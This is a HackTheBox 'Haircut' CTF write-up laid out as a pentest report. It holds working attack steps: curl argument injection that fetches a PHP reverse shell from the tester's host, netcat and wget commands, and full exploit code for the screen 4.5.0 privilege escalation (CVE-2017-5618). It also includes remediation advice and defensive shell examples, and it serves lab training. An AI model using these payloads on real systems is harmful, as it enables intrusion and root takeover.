Haircut CTF Writeup
Writeup presented by Behind Security as part of the Road to OSCP series, focusing on the Haircut CTF from HackTheBox.
Haircut CTF
Haircut CTF touches on several useful attack vectors. Most notably, this machine demonstrates the risk of passing user-controlled input to curl on a command line: the input is not just a URL but a set of arguments, so an attacker can append options such as -o (argument injection). The same pattern still affects many live services today.
HackTheBox
Hack The Box gives individuals, businesses and universities the tools they need to continuously improve their cybersecurity capabilities — all in one place.
Executive Summary
Introduction
This penetration test focused on the IP address 10.10.10.24, with the objective of identifying and assessing vulnerabilities within the target system. The assessment covered service enumeration, web server enumeration, initial access vulnerabilities, and post-exploitation issues.
Objective
The goal of this penetration test was to evaluate the security posture of the target system, identify potential weaknesses, and provide recommendations for mitigating the discovered vulnerabilities.
Requirements
The assessment required thorough testing of the web application hosted at http://10.10.10.24, with a specific emphasis on directory bruteforcing, local file inclusion, and potential remote code execution through arbitrary file upload. Additionally, post-exploitation activities focused on database credential exposure and local privilege escalation to root.
High-Level Summary of Vulnerabilities
1. Directory Bruteforcing (BS01)
- Description: No measures are in place to slow or detect directory bruteforcing, so the web application's directory tree can be mapped quickly with an automated tool.
- Severity: Moderate
- Recommendation: Implement rate limiting to slow directory bruteforcing, and do not rely on unguessable paths to protect content.
2. Local File Inclusion (BS02)
- Description: The exposed.php script passes user input to a curl command as arguments. Supplying a file:// URL makes curl read local files (an arbitrary file read through curl, reported here as Local File Inclusion).
- Severity: Elevated
- Recommendation: Validate the user-supplied URL against an allowlist (http/https only), pass it to curl as a single argument after --, and restrict curl's protocols with --proto.
3. Remote Code Execution (RCE) via Arbitrary File Upload (BS03)
- Description: Because exposed.php forwards user input to curl as arguments, an attacker can append -o uploads/evil.php to a URL pointing at their own server. curl then writes an attacker-controlled PHP file into the web-server-writable /uploads directory, and requesting that file executes it, giving RCE as the web server user.
- Severity: Extreme
- Recommendation: Apply the input handling from BS02; validate file types, restrict uploads, implement proper input validation, and serve the uploads directory without script execution.
4. Exposed Database Credentials (BS04)
- Description: Database root credentials are stored in clear text within the home directory of the "maria" user.
- Severity: Elevated
- Recommendation: Store database credentials in a file readable only by the service that needs them rather than in clear text in a home directory, rotate the exposed password, and limit access to sensitive information.
5. Local Privilege Escalation to Root (BS05)
- Description: An outdated, vulnerable version (4.5.0) of screen is installed with the SUID bit set (/usr/bin/screen-4.5.0), allowing local privilege escalation to root (CVE-2017-5618).
- Severity: Extreme
- Recommendation: Update screen to a non-vulnerable version (or remove the SUID bit from the extra binary) and regularly patch and update system software.
Recommendations
- Implement rate limiting to slow directory bruteforcing, and do not rely on unguessable paths to protect content (BS01).
- Validate the URL passed to curl (http/https only), pass it as a single argument after --, and restrict protocols with --proto to prevent local file reads (BS02).
- Validate file types, restrict uploads, implement proper input validation, and serve the uploads directory without script execution to prevent RCE via arbitrary file upload (BS03).
- Store database credentials in a protected location with restrictive permissions rather than in clear text in a home directory, rotate the exposed password, and limit access to sensitive information (BS04).
- Update screen to a non-vulnerable version (or remove the SUID bit from the extra binary) and regularly patch and update system software to prevent local privilege escalation to root (BS05).
Methodology
The assessment employed automated tools such as Feroxbuster for directory bruteforcing and manual testing for LFI, RCE, and privilege escalation vulnerabilities. Post-exploitation activities involved identifying exposed database credentials and exploiting a known vulnerability in the screen utility.
This summary provides an overview of the key findings and recommendations, but further details and steps to reproduce each vulnerability are available in the "Independent Challenge" section.
Color Legend: in the original, standard console text, commands entered by the pentester and text to highlight were distinguished by colour; {...} marks output abbreviated for brevity.
Risk Classification: the original risk matrix is not reproduced here; findings are rated Moderate, Elevated or Extreme.
Independent Challenge - 10.10.10.24
export IP=10.10.10.24
Service Enumeration
IP Address | Ports Open |
---|---|
10.10.10.24 | TCP: 22, 80 |
Web Server Enumeration (80/tcp)
BS01 - Directory Bruteforcing
Vulnerability Explanation: Nothing slows or detects directory bruteforcing, so an attacker can quickly map the directory tree of the web application with an automated tool. On its own this is an information leak; here it matters because it exposes the /uploads directory that BS03 relies on.
Vulnerability Fix: Implement rate limiting to slow directory bruteforcing, and do not rely on unguessable paths to protect content; anything that must not be reachable needs authentication, not obscurity.
Severity: Moderate
Steps to Reproduce the Attack:
- Run an automated tool like feroxbuster -u http://10.10.10.24 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -x php. The -x php flag makes feroxbuster also try every word with a .php extension; the scan reveals the /uploads directory used later in BS03.
Additional Comments: Feroxbuster output is generally easy to read, and it recurses by default: whenever it finds another directory, it automatically scans inside it.
BS02 - Local File Inclusion
Vulnerability Explanation: The PHP script at http://10.10.10.24/exposed.php runs curl with user-supplied input as its arguments. Because curl accepts URL schemes other than http, an attacker can submit file:///etc/passwd and curl reads the local file and returns it in the response. Strictly this is an arbitrary file read through curl (an SSRF-style issue) rather than a PHP include, but it is reported here as Local File Inclusion (LFI).
Vulnerability Fix: Validate the user-supplied URL against an allowlist (http/https only), pass it to curl as a single argument after --, and restrict curl's protocols with --proto =http,https. Better still, avoid building a shell command at all (for example by using PHP's curl extension).
Severity: Elevated
Steps to Reproduce the Attack:
- Go to http://10.10.10.24/exposed.php.
- Retrieve local files by providing file:///etc/passwd as the input. You can replace /etc/passwd with whatever file the web server user is allowed to read.
BS03 - Initial Access: Remote Code Execution (RCE) via Arbitrary File Upload
Vulnerability Explanation: As previously stated, the script at http://10.10.10.24/exposed.php runs curl with user-supplied arguments, so the attacker controls not only the URL but any additional curl options. The enumeration in BS01 shows a /uploads directory; for the site to receive uploads it has to be writable by the web server user, which is also the user curl runs as. An attacker can therefore point curl at a PHP reverse shell hosted on their own machine and add -o uploads/evil.php, which writes the file into the uploads directory (the relative path is resolved from the script's working directory, the web root, as the later request to /uploads/evil.php shows). Requesting the written file makes the server execute it as the web server user.
Vulnerability Fix: Validate and quote the user input as in BS02. Validate file types and restrict uploads to a dedicated directory that the web server will not execute scripts from. Implement proper input validation.
Severity: Extreme
Steps to Reproduce the Attack:
- Download a PHP reverse shell.
- Open the script in your favourite text editor and set the ip value to your tun0 IP address (and note the port, 1234 by default).
- Host the script using a simple python3 web server:
sudo python3 -m http.server 80
- Go to http://10.10.10.24/exposed.php and submit the following, which makes the server fetch the reverse shell from your web server and save it into its uploads folder:
http://YOUR-TUN0-IP-ADDRESS/php-reverse-shell.php -o uploads/evil.php
- Fire up a netcat listener on port 1234 (if you haven't changed the port value in the php reverse shell):
nc -lvnp 1234
- Request the reverse shell at http://10.10.10.24/uploads/evil.php and enjoy your shell. If nothing calls back, check that your python web server logged a GET for php-reverse-shell.php; if it did not, the -o argument was not passed through and the file was never written.
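The mechanism behind BS02 and BS03 is the same: one user-controlled string is handed to curl as a command line, so the shell word-splits it and every word becomes a separate argument. The following is an added example (not code from the original writeup or from the Haircut box) that shows the vulnerable expansion next to a hardened form. It assumes exposed.php builds a command like "curl <input>" in a shell, which the page's behaviour implies but whose source it does not show; nothing here touches the network, the functions only print the argv that curl would receive.

```shell
#!/bin/sh
# Added example, not from the original writeup. Assumption: the vulnerable script
# runs something equivalent to "curl $input" through a shell (source not shown on
# the page). The inputs used below are constructed for illustration.

# Vulnerable pattern: the input is expanded unquoted, so the shell word-splits it.
# "http://host/x.php -o uploads/evil.php" becomes three argv entries and curl
# treats "-o" as its output option (BS03). A "file://" URL passes straight
# through and curl reads the local file (BS02).
unsafe_curl_argv() {
    # shellcheck disable=SC2086  # the unquoted expansion is the bug being demonstrated
    set -- $1
    echo "argc=$#"
    printf 'argv: %s\n' "$@"
}

# Hardened pattern, three layers:
#  1. allowlist the scheme and a conservative character set, so file:// and any
#     input carrying extra words (options) is rejected before curl sees it;
#  2. hand the value to curl as ONE argument after "--", so it can never be parsed
#     as an option even if the allowlist is loosened later;
#  3. tell curl itself to refuse every protocol except http/https (--proto).
validate_url() {
    nl=$(printf '\nx'); nl=${nl%x}            # a literal newline for the check below
    case $1 in
        *"$nl"*) return 1 ;;                   # grep works line by line: reject embedded newlines first
        http://*|https://*) ;;                 # scheme allowlist: file://, gopher://, dict:// are out
        *) return 1 ;;
    esac
    # no whitespace, quotes or shell metacharacters, so "-o uploads/evil.php" cannot ride along
    printf '%s' "$1" | grep -Eq '^https?://[A-Za-z0-9._~/%?=&:@+-]+$'
}

safe_curl_argv() {
    validate_url "$1" || { echo "rejected: $1" >&2; return 1; }
    # printf instead of exec so the example is inspectable offline; a real fetcher
    # would run exactly these words:  curl --proto '=http,https' --max-time 10 -sS -- "$1"
    printf '%s\n' curl --proto '=http,https' --max-time 10 -sS -- "$1"
}
```

Run unsafe_curl_argv with the BS03 payload and you get argc=3 with -o as its own argument; run the same string through safe_curl_argv and it is rejected, while a plain https URL comes out as the single last argument after --. The --proto restriction is the layer that still holds if someone later relaxes the allowlist, because curl then refuses file:// on its own.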
Post Exploitation
BS04 - Exposed Database Credentials
Vulnerability Explanation: Database root credentials (user and password) were found in clear text within the home directory of "maria" user.
Vulnerability Fix: Store database credentials in a file readable only by the service that needs them rather than in clear text in a home directory, rotate the exposed root password, and limit access to sensitive information.
Severity: Elevated
Steps to Reproduce the Attack:
- Run cat /home/maria/.tasks/task1
BS05 - Local Privilege Escalation to Root
Vulnerability Explanation: An outdated version (4.5.0) of screen is present on the system as /usr/bin/screen-4.5.0 with the SUID bit set. This version is vulnerable to a Local Privilege Escalation (LPE) to root, known as CVE-2017-5618: screen opens the logfile named with -L while still running as root, so an unprivileged user can make it create /etc/ld.so.preload and write into it. Once that file names an attacker-controlled shared object, the dynamic linker loads it into the next privileged execution of screen and the library's constructor runs as root.
Vulnerability Fix: Update screen to a non-vulnerable version (the issue is fixed in 4.5.1) and remove the stray SUID binary. Regularly patch and update system software.
Severity: Extreme
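Before running the exploit it is worth confirming from the BS03 shell that the SUID screen really is the affected build, since the 4.x series prints its version as 4.05.00 rather than 4.5.0. The following is an added check (not part of the original writeup) that enumerates setuid binaries and flags a screen at the version the page discusses. It assumes screen -v prints a first line like "Screen version 4.05.00 (GNU) 10-Dec-16"; the version strings used in the self-checks are constructed, not captured from the box.

```shell
#!/bin/sh
# Added example, not from the original writeup. Assumptions: "screen -v" prints a
# line of the form "Screen version 4.05.00 (GNU) 10-Dec-16"; sample strings in the
# usage note are constructed.

# "4.05.00" and "4.5.0" are the same release: strip leading zeros per component.
normalize_version() {
    printf '%s\n' "$1" | sed -E 's/(^|\.)0+([0-9])/\1\2/g'
}

# Pull the dotted version out of a "screen -v" line; prints nothing if absent.
extract_screen_version() {
    printf '%s\n' "$1" | sed -nE 's/^Screen version ([0-9]+(\.[0-9]+)+).*/\1/p'
}

# Exit 0 when the -v output identifies the 4.5.0 build exploited in BS05.
is_vulnerable_screen() {
    v=$(normalize_version "$(extract_screen_version "$1")")
    [ "$v" = "4.5.0" ]
}

# Walk the filesystem for setuid-root files; for each one named screen*, ask it
# for its version (-v prints and exits, it does not start a session) and report.
# Everything else is listed so the rest of the SUID surface is visible too.
scan_suid_screen() {
    find / -type f -perm -4000 -user root 2>/dev/null | while IFS= read -r bin; do
        case ${bin##*/} in
            screen*)
                out=$("$bin" -v 2>&1 | head -n 1)
                if is_vulnerable_screen "$out"; then
                    echo "VULNERABLE (CVE-2017-5618): $bin -> $out"
                else
                    echo "not affected: $bin -> $out"
                fi ;;
            *) echo "setuid: $bin" ;;
        esac
    done
}
```

Source the file in the foothold shell and call scan_suid_screen; a hit looks like "VULNERABLE (CVE-2017-5618): /usr/bin/screen-4.5.0 -> Screen version 4.05.00 (GNU) 10-Dec-16" (constructed sample). The scan only reads metadata and runs screen with -v, so it is safe to run on a box you do not yet want to modify.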
Steps to Reproduce the Attack:
- Paste the following on your local machine's terminal to create libhax.c. Its constructor runs as root when ld.so loads the library into the setuid screen; it turns /tmp/rootshell into a root-owned SUID binary and then deletes ld.so.preload so the system is not left loading the library into every process:
cat << 'EOF' > libhax.c
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
/* runs automatically when the shared object is loaded into a process */
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);     /* make the helper root-owned */
    chmod("/tmp/rootshell", 04755);    /* setuid root + executable */
    unlink("/etc/ld.so.preload");      /* clean up so nothing else loads us */
    printf("[+] done!\n");
}
EOF
- Compile it and remove the C source. The shared object has to be built for the target's architecture and against a glibc no newer than the target's, otherwise ld.so will refuse it; if the target has a compiler, build there instead:
gcc -fPIC -shared -ldl -o libhax.so libhax.c && rm -f libhax.c
- Paste the following on your local machine's terminal to create rootshell.c (once libhax.so has made it SUID root, it sets the real and effective ids to 0 and execs a shell):
cat << 'EOF' > rootshell.c
#include <stdio.h>
#include <unistd.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execl("/bin/sh", "sh", (char *)NULL);
    perror("execl");   /* only reached if the exec fails */
    return 1;
}
EOF
- Compile it and remove the c program:
gcc -o rootshell rootshell.c && rm -f rootshell.c
- Create
exploit.sh
and insert the following using your favourite text editor:
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
cd /etc
umask 000
/usr/bin/screen-4.5.0 -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
/usr/bin/screen-4.5.0 -ls # screen itself is setuid, so...
/tmp/rootshell
- Run the following to start an HTTP server using python to transfer the compiled programs and exploit.sh to the victim machine:
sudo python3 -m http.server 80
- Within the victim machine, head to /tmp:
cd /tmp
and use wget to transfer the exploit files from your machine:
wget http://YOUR-TUN0-IP-ADDRESS/rootshell && wget http://YOUR-TUN0-IP-ADDRESS/libhax.so && wget http://YOUR-TUN0-IP-ADDRESS/exploit.sh
- Mark the exploit as executable and run it:
chmod +x exploit.sh && ./exploit.sh
You'll get a root shell. The paths are fixed: libhax.so and rootshell must live in /tmp, because exploit.sh writes /tmp/libhax.so into ld.so.preload and the library chmods /tmp/rootshell. If the run fails partway, confirm that /etc/ld.so.preload has been removed; while it exists, every dynamically linked program on the box tries to load /tmp/libhax.so.
Conclusion
We hope you have found our content useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing Behind Security, we hope to see you again soon!
BEHIND SECURITY
Behind Security is an online platform dedicated to providing informative articles on cybersecurity, privacy, and programming.